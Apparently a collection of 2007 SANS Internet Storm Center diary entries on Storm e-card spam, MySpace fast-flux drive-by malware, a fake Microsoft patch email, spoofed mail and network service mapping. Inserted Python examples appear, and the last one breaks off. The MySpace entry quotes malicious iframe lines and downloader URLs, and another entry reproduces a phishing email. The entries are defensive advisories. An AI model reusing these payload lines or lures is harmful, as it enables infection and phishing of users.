Published: 2007-06-30

Tick tock - where has the time gone

Reader Paul recently sent an email to us stating that he could not get to tick.usno.navy.mil or tock.usno.navy.mil for time synchronization. Upon quick investigation, we determined that this was a universal problem. The two DNS names resolve to and respectively. This is a clear indication that DNS resolution for these names is working fine.

From there, we began to do traceroutes from various looking glasses in order to determine if this problem is universal. What we saw was that regardless of the looking glass, the traffic never made it past 2 hops at the most. This led us to believe it could be a BGP problem, so we started to determine if the problem was with just the network in question or if the whole AS was down.

Further research pointed out that this network is part of AS721. However, it appears as if this network is no longer listed as part of that AS number based upon the CIDR Report for the AS. So it seems clear that there was a recent change removing this network from the AS and hence this is the reason those addresses are not reachable.

The final conclusion is that either the network was removed from the AS in error, or the systems were moved to a different address range without the DNS records being updated. We would notify the cert.mil if we had the ability to visit their website. Unfortunately, we do not.


Published: 2007-06-30

The wave continues - Subject line variation

In a follow-up to our previous story about the e-card exploit, we have received an unconfirmed report from one of our readers that the subject lines have begun to change. At this point in time, the reader has reported the following variations to us:

You've received [a|n] [greeting|] [postcard|ecard] from a [admirer|class-mate|colleague|family member|friend|mate|neighbor|neighbour|partner|school friend|school mate|school-mate|worshipper]!

If you are seeing these or other variations, please let us know so that we can update this article accordingly and help email administrators in setting their mail filters accordingly.
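As an added example (not part of the original diary), the reported template turned into a regular expression that a mail filter can test subject lines against; the template's "[a|n]" is read as "a" or "an", and "[greeting|]" as an optional word. The sample subjects are constructed for the test.

```python
import re

# Sender words from the template reported to us, used to build the pattern.
SENDERS = ["admirer", "class-mate", "colleague", "family member", "friend",
           "mate", "neighbor", "neighbour", "partner", "school friend",
           "school mate", "school-mate", "worshipper"]

# "[a|n]" -> "a" or "an"; "[greeting|]" -> optional "greeting"; "[postcard|ecard]".
ECARD_SUBJECT = re.compile(
    r"^You've received an? (?:greeting )?(?:postcard|ecard) from a "
    + "(?:" + "|".join(re.escape(s) for s in SENDERS) + r")!$",
    re.IGNORECASE,
)

def is_ecard_lure(subject):
    """True if a mail subject matches the Storm e-card lure template."""
    s = subject.strip()
    if s.lower().startswith("subject:"):      # accept a raw header line too
        s = s[len("subject:"):].strip()
    return ECARD_SUBJECT.match(s) is not None

def scan(subjects):
    """Return the subjects that match, preserving their order."""
    return [s for s in subjects if is_ecard_lure(s)]

# Constructed samples: the subject quoted in the earlier diary plus variants.
SAMPLES = [
    "You've received a postcard from a family member!",
    "You've received an greeting ecard from a school-mate!",
    "Subject: You've received a postcard from a worshipper!",
    "You've received a postcard from a stranger!",   # not in the reported list
    "Your ecard is waiting",                          # unrelated
]

if __name__ == "__main__":
    for s in scan(SAMPLES):
        print("match:", s)
```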



Published: 2007-06-29

ReAssure Project

As a part of my daily activities, I set up, modify or use a number of virtual machines that are used in my security research. One of the others in the ISC stumbled across a very interesting project involving virtual systems. The project is called ReAssure and is intended to give faculty, staff and students a platform to use virtual machines in experimentation more effectively. It also appears that they provide a much more convenient way of storing and sharing these virtual images in a way that lends itself to derivative research. I would expect that others may be interested in this project and may be able to learn from the efforts at Purdue.

For more information, see http://projects.cerias.purdue.edu/reassure/


Published: 2007-06-29

Bootable USB Security Distro on USB Key

Greetings everyone.  For many of us, Friday (or Saturday) is the end of the quarter or even potentially the end of a fiscal year.  So, amongst the emails related to the Fake MS Patch, MySpace Flux Malware and Storm Wave emails and the interruptions of a retirement party and trying to spend money at the last minute,  I stumbled across something that may be useful for a number of our readers.

Oiepoie (a blog site in NL) posted back in December the instructions needed to convert a standard USB key into a bootable security toolkit. The writer of the site used the old version of the BackTrack live Linux ISO and a 1G USB device for this project, but you can modify the steps for BackTrack2, Helix, or similar and have a handy toolkit at hand.

For those that are Unix or Linux admins, I apologize up front since this probably isn't as useful for you.  But for those that primarily use other operating systems but haven't been a Unix admin in recent years, this might be a very welcome instruction set.

The instructions are located at http://www.oiepoie.nl/2006/12/20/bootable-security-distro-on-your-usb-stick/





Published: 2007-06-28

Riding out yet Another Storm Wave

Sadly you won't need a surf board for this one. Just to give you a heads up, there is a new round of emails with malicious links that is making its way to the inboxes of many folks. If you haven't gotten one yet, just give it time. Here is a quick summary of what we have found.

The subject lines of the examples we have gotten have all been identical. You may have gotten something else.

"Subject: You've received a postcard from a family member!"

The following is an excerpt from the email body.  (WARNING:  Do NOT


Click on the following Internet address or
copy & paste it into your browser's address box.


Copy & paste the ecard number in the "View Your Card" box at

Your ecard number is

The ecard numbers in the URL above are variable across SPAM samples.

Several additional examples for pattern freaks :):


The website has an interesting javascript that appears to have multiple ways to exploit a browser in order to compromise a system.  If javascript is enabled, then you get:

MD5 (tm.exe) = 07276fce39282fd182757d2557f9eca7  which is a downloader that gets this:

MD5 (logi.exe) = 4aa22564a0b886226d8cf14456a598ab

If javascript is disabled, then they provide you a handy link to click on to exploit yourself and you get ecard.exe = MD5: 30051dc10636730e4d6402ef8e88fd04.  Here is what a user would see:

 "We are currently testing a new browser feature. If you are not able to
view this ecard, please click here to view in its original format."

Here is a listing of just a handful of the 10s to 100s of thousands of infected home systems. Every Storm-infected system is potentially capable of hosting the malware and sending the SPAM, but only a few will be used in any given SPAM run, depending on how many emails they want sent and how many web hits they're expecting. You will notice the country/network diversity and the predominance of broadband providers (data courtesy of Team Cymru):

AS    | IP | BGP Prefix | CC | Registry | AS Name
5603  |    |            | SI | ripencc  | SIOL-NET SiOL Internet
29737 |    |            | US | arin     |
16810 |    |            | US | arin     | CAVTEL02 - Cavalier Telephone
7132  |    |            | US | arin     | SBIS-AS - AT&T Internet Svcs/Ameritech
7132  |    |            | US | arin     | SBIS-AS - AT&T Internet Svcs/SBC Global
3320  |    |            | DE | ripencc  | DTAG Deutsche Telekom/Dialin.net
12392 |    |            | BE | ripencc  | ASBRUTELE AS/Brutele SC
21502 |    |            | FR | ripencc  |
18881 |    |            | BR | lacnic   | Global Village Telecom
25515 |    |            | RU | ripencc  | CTCNET-AS Joint-Stock Central Telecom.
8642  |    |            | SE | ripencc  | B2 B2

As you can see, detection is skimpy at this point. The key detection below is "Tibs" (aka Storm/Nuwar/Peacomm).

Complete scanning result of "ecard.exe", received in VirusTotal at 06.28.2007, 21:24:37 (CET).

Antivirus Version Update Result
AhnLab-V3 2007.6.27.0 06.28.2007  no virus found
AntiVir 06.28.2007 HEUR/Crypted
Authentium 4.93.8 06.27.2007  no virus found
Avast 4.7.997.0 06.27.2007  no virus found
AVG 06.28.2007  no virus found
BitDefender 7.2 06.28.2007  no virus found
CAT-QuickHeal 9.00 06.27.2007  no virus found
ClamAV devel-20070416 06.28.2007  no virus found
DrWeb 4.33 06.28.2007  no virus found
eSafe 06.27.2007 Suspicious Trojan/Worm
eTrust-Vet 30.8.3747 06.28.2007  no virus found
Ewido 4.0 06.27.2007  no virus found
FileAdvisor 1 06.28.2007  no virus found
Fortinet 06.28.2007  no virus found
F-Prot 06.28.2007  no virus found
F-Secure 6.70.13030.0 06.28.2007 Tibs.gen118
Ikarus T3.1.1.8 06.28.2007  no virus found
Kaspersky 06.28.2007  no virus found
McAfee 5062 06.27.2007  no virus found
Microsoft 1.2701 06.28.2007  no virus found
NOD32v2 2360 06.28.2007  no virus found
Norman 5.80.02 06.27.2007 Tibs.gen118
Panda 06.28.2007 Suspicious file
Sophos 4.19.0 06.24.2007  no virus found
Sunbelt 2.2.907.0 06.27.2007 VIPRE.Suspicious
Symantec 10 06.28.2007  no virus found
TheHacker 06.28.2007  no virus found
VBA32 06.27.2007  no virus found
VirusBuster 4.3.23:9 06.27.2007  no virus found
Webwasher-Gateway 6.0.1 06.28.2007 Heuristic.Crypted

Additional Information
File size: 7915 bytes
MD5: 30051dc10636730e4d6402ef8e88fd04
SHA1: 05368309bf89a78d680e239f58ec39bb0f8963b6




Published: 2007-06-26

MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.

  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

  A typical excerpt from an infected profile (obfuscated to protect the innocent): 


<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.

   The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:

    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
   The domain used here is of course again served via flux. header_03.gif


    <iframe src="http://fafb4c4c .com/routine.php" width=1

Are we there yet? Yup. Just one more (patched) Internet Explorer exploit to go. The exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. We have seen, among others, these:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

Once it's all said and done, you will be a proud new member of the flux net, and soon you will find your system participating in phishing and similar endeavours.

A couple of IPs that may be worthwhile to block:

AS13767   | 
AS15083   |
AS25761   |    
AS25761   |   

As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.





Published: 2007-06-26

Microsoft Re-Releases MS07-022

On June 26th 2007,  Microsoft re-released the  MS07-022 update for Windows 2000 SP4.  This update addresses some problems related to the NEC 98 hardware.  For more information related to the issues, please see http://support.microsoft.com/kb/931784/.


Published: 2007-06-26

FAKE Microsoft patch email -> Fake Spyware Doctor!

Several of our readers reported an email that led to a fake Microsoft patch being spammed on the net today. The email had their full names and, in one case, the company they worked for included in the body of the email. So far I have seen 4 different URLs. We are working on getting the systems hosting the malware cleaned or shut down. We have submitted the malware itself to most of the AV vendors, so detection should improve, but currently it is not detected.

Thanks go out to PatrickC, TroyP, NathanM, BruceD and CalebC.

You can see in the body of the email below that the spelling is bad and the license key is not in the right format for XP nor Outlook.

One of the submitters “PatrickC” provided the following email for a fake Microsoft patch and malware site.  

“The following email I received is new to me. The URL points to
==Sanitized email header==============
X-Envelope-To: <patrick >
<SNIP to protect Patrick >
Date: Tue, 26 Jun 2007 14:51:39 +0200
Precedence: bulk
To: Patrick 
Subject: Microsoft Security Bulletin MS07-0065 - Critical Update
From: "Microsoft Corp." <update@microsoft.com>
Content-Type: text/html; charset=iso-8859-1
Message-Id: <E1I3AWB-00010F-00@s137553944.websitehome.co.uk>
X-Antivirus: avast! (VPS 000752-0, 2007-06-25), Inbound message
X-Antivirus-Status: Clean 
Microsoft.com Home |
| Windows Family | Windows Marketplace | Office Family | Microsoft Update  
Dear Patrick

You are receiving this message because you are using Genuine Microsoft Software and your e-mail address has been subscribed to the Microsoft Windows Update mailing list.

A new 0-day vulnerability has appeared in the wild and was reported for the first time Monday, June 18th. The vulnerability affects machines running MICROSOFT OUTLOOK and allows an attacker to take full control of the vulnerable computer if the exploitation process is succesfull.

Since then, more than 100,000 machines have been reported as exploited and used to promote spammy pharmacy products such as viagra and cialis.

An update has been released to fix this issue and can be downloaded from the following link :

http://windowsupdate.microsoft.com/outlook/upd ate-0-day/download.aspx?id=63852

Quick Details
File Name: MSOUTRC2007Update-KB863892.exe
Version: 3.1.1023
Date Published: 06/25/2007
Download Size: 20 Kb
Estimated Download Time: 1 sec

It's urgent to download and install the update as soon as possible in order to decrease the number of succesfull attacks that occure each day. The update is only available for Genuine Versions of Microsoft Outllok. 
Instructions :  
1. Click the link above to start the download
2. Save the update in your WINDOWS directory and run it from there.If you want to start the installation immediately click Run in the download box, after you click the link.
3. After you run it, the update will download the security packages required to patch Microsoft Outlook.The entire process will take around 10-15 minutes, and you'll receive a confirmation message once the update process is completed.

Your Microsoft Windows Licence Information is :


Thank you

Microsoft Corp.


From Norman Sandbox:

MSOUTRC2007Update-KB863892.exe : INFECTED with W32/Malware (Signature: NO_VIRUS)

 [ DetectionInfo ]
    * Sandbox name: W32/Malware
    * Signature name: NO_VIRUS
 [ General information ]
    * Drops files in %WINSYS% folder.
    * File length:        20480 bytes.
    * MD5 hash: c7a8bde380043b5d8d7229e82db1c2fc.
 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\SYSTEM32\sdoctor.exe.
    * Creates file C:\france.html.
    * Deletes file c:\france.html.
 [ Changes to registry ]
    * Creates value "SpywareDoctor"="C:\WINDOWS\SYSTEM32\sdoctor.exe" in key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
 [ Process/window information ]
    * Will automatically restart after boot (I'll be back...).
    * Attemps to NULL C:\COMMAND.COM /c del c:\sample.exe >> NUL.
    * Modifies other process memory.
    * Creates a remote thread.
[ Signature Scanning ]
    * C:\WINDOWS\SYSTEM32\sdoctor.exe (20480 bytes) : no signature detection.

We notified one of the support teams at a hosting provider that a virus was found on one of their customers' systems.

Their auto responder responded within a minute.
A support person removed the malware and responded within 30 minutes.
When I tried to verify that, I found the malware was still there (or back).
When I notified the hosting provider that the malware was back, the support person analysed logs, determined it was being uploaded via FTP, and immediately disabled the FTP account involved.


Published: 2007-06-26

Spam volume

Today, Robert reported that he is seeing a higher than normal spam volume. We do get notes like this rather regularly. Usually, it's just a matter of "your turn coming up" in the global spam game. Here are a few URLs I use to check on the global spam volume:

Spamcop http://spamcop.net/spamgraph.shtml?spamstats

Messagelabs: http://www.messagelabs.com/intelligence.asp

Postini: http://www.postini.com/stats


Published: 2007-06-26

Preventing spoofed internal e-mail

Nick submitted a nice piece of malware we are currently looking at. The malware itself includes a nice rootkit that doesn't appear to be detected with common rootkit tools. However, in my opinion, the delivery method was noteworthy. It used a spoofed internal sender. This made me wonder what's the best way to block e-mail that comes from outside mail servers, but claims an internal "From:" header.

My first guess would be that this is a great reason to enable SPF. Will this work?  I am assuming that it is a standard policy to require employees to use a VPN connection or "something like that" to send e-mail using an internal mail server.

Any other ideas?


Published: 2007-06-25

Blocking spoofed internal email from external sources

One suggestion from Chris in the UK.

SPF is a red herring here - you surely know what IP address(es) are yours (and hence may send mail using *your* domain). You don't need SPF to tell you this. Simply reject any such mails received from off-net.

Unfortunately, this will cause false positives e.g where someone posts to a remote mailing list.  The mail goes out then comes back in from a remote IP, (the list server) with your domain still as From: header.  Hence the sender doesn't get their own copy, nor does anyone else in your organisation who subscribes.

One solution is to add a special header to all mail you originate, so you can recognise it if it comes via such a route. This isn't cast iron, as it could be spoofed by a determined attacker, so some form of signing would be better in theory (domain keys?). Nevertheless, I know some UK university sites who use the header method with good results.

Then there are the remote e-card type sites that originate greeting mails with your domain - but losing these is probably not the end of the world...
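The policy Chris describes, as an added example that is not part of his post: reject mail whose From: claims our domain when the connecting IP is off-net, except when the message carries the marker our own outbound MTA stamped on it (the mailing-list round trip). The domain, networks, header name and secret are assumed; instead of a fixed header value, the marker is an HMAC over the Message-ID, which is one "form of signing" that stops a marker copied from a list archive from being reused on a different message.

```python
"""Inbound policy check for mail that claims our own domain in From: but
arrives from an off-net IP, with the mailing-list round-trip exception."""
import hmac
import hashlib
from email import message_from_string
from email.utils import parseaddr
from ipaddress import ip_address, ip_network

OUR_DOMAIN = "example.org"                       # assumed
OUR_NETS = [ip_network("192.0.2.0/24")]          # assumed: hosts allowed to send as us
MARK_HEADER = "X-Example-Origin"                 # assumed private marker header
MARK_SECRET = b"constructed-secret-change-me"    # assumed secret known only to our MTA

def origin_mark(message_id):
    """Marker value stamped on outbound mail: an HMAC over the Message-ID.
    A fixed string could be copied from any list archive; binding the
    value to the Message-ID makes a copied header useless elsewhere."""
    return hmac.new(MARK_SECRET, message_id.encode(), hashlib.sha256).hexdigest()

def stamp_outbound(raw_msg):
    """What our outbound MTA would do: add the marker before the mail leaves."""
    msg = message_from_string(raw_msg)
    msg[MARK_HEADER] = origin_mark(msg.get("Message-ID", ""))
    return msg.as_string()

def inbound_decision(raw_msg, peer_ip):
    """Return 'accept' or a 'reject: ...' string for a message received from
    peer_ip (the connecting SMTP client address, not anything in the headers)."""
    msg = message_from_string(raw_msg)
    domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    if domain != OUR_DOMAIN:
        return "accept"                                 # not claiming to be us
    if any(ip_address(peer_ip) in net for net in OUR_NETS):
        return "accept"                                 # on-net, e.g. via the VPN
    mark = msg.get(MARK_HEADER, "")
    expected = origin_mark(msg.get("Message-ID", ""))
    if mark and hmac.compare_digest(mark, expected):
        return "accept"                                 # our own mail back from a list
    return "reject: off-net source %s claims %s in From:" % (peer_ip, OUR_DOMAIN)

# Constructed samples.
SPOOFED = (
    "From: IT Helpdesk <helpdesk@example.org>\r\n"
    "To: alice@example.org\r\nMessage-ID: <1@attacker.invalid>\r\n"
    "Subject: Urgent update\r\n\r\nPlease open the attachment.\r\n"
)
LIST_COPY = stamp_outbound(
    "From: bob@example.org\r\nTo: list@lists.invalid\r\n"
    "Message-ID: <2@example.org>\r\nSubject: Patch question\r\n\r\nHi all\r\n"
)
# A genuine marker lifted from LIST_COPY and pasted onto the spoofed message.
FORGED = SPOOFED.replace(
    "Subject:", MARK_HEADER + ": " + origin_mark("<2@example.org>") + "\r\nSubject:")

if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("list copy", LIST_COPY), ("forged", FORGED)):
        print(name, "->", inbound_decision(raw, "198.51.100.20"))
```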




Published: 2007-06-24

Blocklists & Politics

Philipp K from Vienna, Austria submitted this story, which I found very enlightening. It shows several things: the double-edged sword of blocklists, and just some of the politics of security. Shown below is the submission, in its entirety. Thank you Philipp for the interpretation!!

spamhaus.org put the IP range of the Austrian domain registry (nic.at) on their Spamhaus Block List [SBL] [1], even though they did not send spam messages. By doing that, they wanted to force nic.at to remove specific .at domains, whose subdomains reportedly host phishing sites. However nic.at did not comply as they claimed it would violate their general terms and conditions and it would also breach Austrian jurisdiction [2].

During the next few days different allegations occurred: It was claimed the subdomains were hacked (so the registration itself was all right) and nic.at referred spamhaus.org to the specific hosts and registrar as the specific problem was located there [3]. The number of offending pages varies from 15 [4] to hundreds [5], depending on who (and also when) you asked. nic.at changed IP addresses only to be blocked a few hours later again. spamhaus.org refused to comment on its actions, making some issues even more confusing.

On the 21st spamhaus.org stopped the blocking [6] (only listing nic.at as supporter to "name and shame", still existing today [5]), as they reported all offending pages are gone. nic.at countered that they did not remove a single domain, but the specific hosts finally reacted (to whom they had referred spamhaus.org right from the start).

Now the Internet Service Provider Austria [ISPA] is warning its members against spamhaus.org because of their "overreaction" [7].

This is just the short version; I have only described the most important developments for brevity.

Altogether this seems to be a big mess, being driven by different goals, points of view, and also ego. Using blocklists is a two-edged sword (which has also been stated on isc.sans.org numerous times), but this story only makes me wonder about the sanity of the whole system.

[1] http://www.spamhaus.org/sbl/sbl.lasso?query=SBL55483

[2] http://www.heise.de/newsticker/meldung/91417

[3] http://futurezone.orf.at/it/stories/201402/

[4] http://www.heise.de/newsticker/meldung/91453

[5] http://www.heise.de/newsticker/meldung/91642

[6] http://www.spamhaus.org/organization/statement.lasso?ref=7

[7] http://futurezone.orf.at/it/stories/201924/


Published: 2007-06-24

Apple Releases Patch for Cross-Site Scripting Vulnerability

On Thursday Apple released a patch which addresses a cross-site scripting vulnerability. It can be downloaded from Apple Update or Apple Software Downloads.

From the Apple website


  • WebCore

    CVE-ID: CVE-2007-2401

    Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.9 or later, Mac OS X Server v10.4.9 or later

    Impact: Visiting a malicious website may allow cross-site requests

    Description: An HTTP injection issue exists in XMLHttpRequest when serializing headers into an HTTP request. By enticing a user to visit a maliciously crafted web page, an attacker could conduct cross-site scripting attacks. This update addresses the issue by performing additional validation of header parameters. Credit to Richard Moore of Westpoint Ltd. for reporting this issue.

  • WebKit

    CVE-ID: CVE-2007-2399

    Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.9 or later, Mac OS X Server v10.4.9 or later

    Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution

    Description: An invalid type conversion when rendering frame sets could lead to memory corruption. Visiting a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution. Credit to Rhys Kidd of Westnet for reporting this issue.


Published: 2007-06-23

Exploit against MS07-033 being used in the wild

The Symantec folks identified a website exploiting a bug from this month's Microsoft patches, specifically the Microsoft Internet Explorer Speech API 4 COM Object Instantiation Buffer Overflow Vulnerability. Here is the URL to their blog entry:


Apparently, the actual exploit is similar to the proof of concept code posted on a popular exploit site ten days ago.


Published: 2007-06-23

More Hostile Advertisement Filtering

Yesterday we published a diary about blocking active code in banner ads.  Adrian wrote to us to provide additional information on some of the tools he uses. 

Adblock plus is a blocklisting mechanism. It is useful for blocking images and all sorts of ads, when you know exactly what the URLs for those are, or you can make a reasonable wildcard for, but in the end it won't catch everything, and most importantly, it won't catch everything THE FIRST TIME. You have to know it to block it, and that means loading it at least once.

This is where NoScript comes in: it turns the javascript trust mechanism upside down, using whitelisting instead. So, instead of allowing everything by default, it blocks everything by default (and that means flash, javascript, java, etc), and you can decide EXACTLY which sites you allow content to come from and be executed.


If a web page pulls down javascript code from more than one place you can decide if you allow or deny javascript for each site that JS code is referenced from. This means you can allow javascript to be executed for a page you know is safe and at the same time block javascript from anywhere else that's referenced on that page.

NoScript + AdBlock plus +adblock filter subscriptions (i.e. self-updating) are a great way of filtering junk that's out there, and are working great as a team.

Other filters to consider:


ABP Tracking filter

RO List (for filtering ads on Romanian sites)

Jamie Plucinski's filter list

Thanks, Adrian!

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-06-22

Active Banner Ads

One of our readers, Walter, wrote to us today with a request to owners of websites:  please block any third-party advertisements that contain scripts or any form of mobile code.

Why?  Well, consider this scenario:

1) Sleazy vendor (or rogue affiliate) "rents" compromised home computers from a bot-farmer

2) Sleazy vendor submits to an adserver an innocent-looking ad for some legitimate-looking product, totally unrelated to the malware.

3) The innocent-looking ad contains javascript that re-directs the browser to a compromised bot, which in turn re-directs the browser to the final malware page.  Thus, a website blocking any ads linking to systemdoctor.com or winfixer won't help.  The user is re-directed to one of millions of compromised bots, and the bot re-directs to the malware page.

An example of malware-via-adserver is detailed at

This is not a new problem. We covered cases like this in the past where an entire ad server gets compromised and the advertisements it is generating contain malware that gets injected via an iframe. The correct solution is to only accept images from advertisers that are linked to another website, and no mobile code. You clearly can't control what happens on that web site, but at least no mobile code is injected into your users' browsers just because they visited you.

One of our readers reminded us that Mozilla has a plug-in that allows Firefox readers to reject ads.  Also, I should have plugged a solution I've been using on my own computers for a few years - modifying your hosts.txt file to point all of the known ad servers at  Details are on MVPS.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-06-22

Hacking Harry

Well, it was bound to happen.  The "research" chat rooms and mailing lists are all buzzing about the clever hack that somebody claims to have pulled off.  We'll know for sure when the book comes out and we confirm or deny what's going on.  We're not going to reveal the supposed ending for those who enjoy reading the series about the young wizard but there's plenty of web sites that are already spoiling the fun.  So if you know somebody who is a Harry Potter fan and doesn't want to be spoiled, warn them about the supposed leak.

If it's true, then the way the bandit pulled off the heist should be noted by anybody responsible for protecting "secrets", whether they are national secrets, homeland security secrets (ahem!), or intellectual property secrets. According to anonymous posts on a popular mailing list, a "usual milw0rm downloaded exploit" was delivered by targeting email to employees of the publishing company. One or more employees clicked on the link, a browser opened, and they clicked on an animated icon. The malware in the animated icon then opened up a reverse shell and it was game over. Apparently there were plenty of draft copies lying around on the company's hard drives, so downloading a personal copy was easy. I suppose if you watched The Devil Wears Prada last year you are thinking "yes, that's probably true."

Note to CIOs:  you must recognize targeted attacks as a serious threat to the protection of your organization's intellectual property.  This is no longer just a theory or academic exercise.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-06-22

Fake Adobe Shockwave Player download page

Jason Frisvold wrote to us about a suspicious web page. One of his users visited the web page he submitted and subsequently got infected with a Trojan horse.

When we get reports of web pages like this one, I typically first download the web page with wget (faking the User Agent field, of course, so the target site thinks I’m using Internet Explorer). In almost 100% of cases the bad guys lately just insert hidden iframe links which point to web sites hosting various exploits.

However, the web site submitted by Jason didn’t have any such elements and I actually forgot about it until we heard again from Jason who managed to find out what happened here.

In short, it's pure social engineering: the user is actually encouraged to install the malware himself. How does this work, you might think?

When visited, the web page in question (a game site related to RuneScape) shows a couple of broken icons, and all links just point to another web page that conveniently informs the user that his version of Macromedia Flash Player needs to be updated. After this notice, the user is redirected to a web site hosting a complete replica of the Shockwave Player Download Center, as you can see below:

Fake Shockwave Download Center

All the links on this web page lead to Adobe’s web site except for one (I’m pretty sure you can guess which one).

Besides creating a really nice replica of Adobe’s web site, the bad guys also added this little JavaScript to it:

var message="";
// IE branch: swallow the right click (the alert text is empty on this site).
function clickIE() {if (document.all) {alert(message);return false;}}
// Netscape/Mozilla branch: buttons 2 and 3 are the middle and right buttons.
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {alert(message);return false;}}}
// Event hookup, assumed from the commonly circulated version of this script
// (the excerpt we captured was incomplete here).
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")

This JavaScript disables right click so you can’t use this context menu for any actions.

The downloaded malware contains a full installer that, when tested on VirusTotal, had very low detection.

Technically this attack wasn’t even worth the diary, however, the appearance could probably fool a lot of users. Although it’s extremely easy to see the fake web site (the URL was visible in the Address bar), the question is how many users would really do this. Would SSL help here? Yes, but again only if users pay attention and in this case they would first have to be trained to check for it when downloading files, and that’s another story.


Published: 2007-06-21

Summary of TCP services on your network

One of my colleagues asked for a simple way to see what services are live on a given network, in preparation, I suppose, for setting up a firewall.  Here's what I recommended as a quick and easy way to map both local tcp services and outgoing connections.

First, at your perimeter or on some internal router, capture all the tcp packets with both the SYN and ACK flags set.  As a general rule, there will be one of these for every connection established between a client and server.  Yes, this approach can have false negatives and false positives - see the body of the script below - but it's pretty close to reality.  On Windows, install winpcap and run windump like this:

windump -D

to find the number of the network interface leading toward the Internet.  Then run:

windump -i {interfacenum} -tnp -w c:\synacks.pcap "tcp[13] & 0x12 = 0x12"

On unixes, use:

route -n

to see the available interfaces, and run:

tcpdump -i {interface} -tnp -w /root/synacks.pcap 'tcp[13] & 0x12 = 0x12'

Let that run for a little while, then summarize the connections with synack-summary from:


Download this script.  It should run fine on unixes or in the cygwin window on windows systems (see http://www.cygwin.com)

You'll probably want to customize it a little.  Change the following lines to reflect any internal IP addresses for your network (feel free to remove or add lines):

-e 's/ \(12\.13\.14\.137\) / knownip\1 /' \
-e 's/ \(12\.13\.15\.1[6-9][0-9]\) / knownip\1 /' \

Also, give names to your systems.  If you have multiple machines all serving the same purpose, you can call them all "www" or "mail"; the names don't have to match the dns or netbios names.  Edit this block:

-e 's/ 12\.13\.14\.137 / dumbo /' \
-e 's/ 12\.13\.15\.162 / goofy /' \
-e 's/ 12\.13\.15\.163 / minnie /' \
-e 's/ 12\.13\.15\.166 / pluto /' \

If you're running this on the machine capturing the packets, run:

synack-summary /root/synacks.pcap | uniq -c | less

If the packets are being captured on another system, run this:

ssh root@router 'cat /root/synacks.pcap' | synack-summary - | uniq -c | less

Here's a sample of the lines you'll see:

     62 _               minnie                http
   2496 _               pluto                  ssh
   9179 _               pluto                rsync
    324 dumbo           _                     smtp
     10 goofy           _                     http
     21 minnie          _                     http

An underscore is a remote system.  The first column is the count, second is the client machine for outbound connections, the third is the server machine for local servers, and the 4th is the protocol.  Unknown ports will show up as "up:portnum" - if you see these, add a line to the script with the port name you want to use (see the block with "-e 's/ 21 $/ ftp /' \").

In this example, minnie and pluto are running http, ssh, and rsync servers, and dumbo, goofy and minnie make outbound smtp and http connections.
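The same summary the script produces, as an added example in Python rather than the diary's own synack-summary sed pipeline: a stdlib-only reader for a classic libpcap file that keeps SYN/ACK frames and folds them into the count/client/server/service rows shown above. The host names and addresses are the diary's constructed ones, and the sample capture is built inside the block.

```python
"""Summarize SYN/ACK packets from a libpcap file into (count, client, server, service) rows.

Added example, not William Stearns' synack-summary script: a stdlib-only Python
reimplementation of the same idea for Ethernet/IPv4/TCP captures. Host names and
addresses below are the constructed ones from the diary's sed lines.
"""
import struct
from collections import Counter

KNOWN_HOSTS = {                      # internal addresses -> names (constructed, as in the diary)
    "12.13.14.137": "dumbo",
    "12.13.15.162": "goofy",
    "12.13.15.163": "minnie",
    "12.13.15.166": "pluto",
}
SERVICES = {21: "ftp", 22: "ssh", 25: "smtp", 80: "http", 443: "https", 873: "rsync"}
SYN, ACK = 0x02, 0x10


def iter_frames(data):
    """Yield each captured frame from a classic pcap file (either byte order)."""
    if data[:4] == b"\xd4\xc3\xb2\xa1":
        end = "<"
    elif data[:4] == b"\xa1\xb2\xc3\xd4":
        end = ">"
    else:
        raise ValueError("not a classic libpcap file")
    if struct.unpack(end + "I", data[20:24])[0] != 1:   # LINKTYPE_ETHERNET
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(end + "IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_synack(frame):
    """Return (src_ip, dst_ip, src_port) for an IPv4/TCP frame with SYN and ACK set, else None."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":   # 14 eth + 20 ip + 20 tcp minimum
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[0] >> 4 != 4 or ip[9] != 6:                    # IPv4 carrying TCP
        return None
    tcp = ip[ihl:]
    if len(tcp) < 14 or tcp[13] & (SYN | ACK) != (SYN | ACK):   # the 'tcp[13] & 0x12 = 0x12' test
        return None
    sport = struct.unpack(">H", tcp[0:2])[0]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
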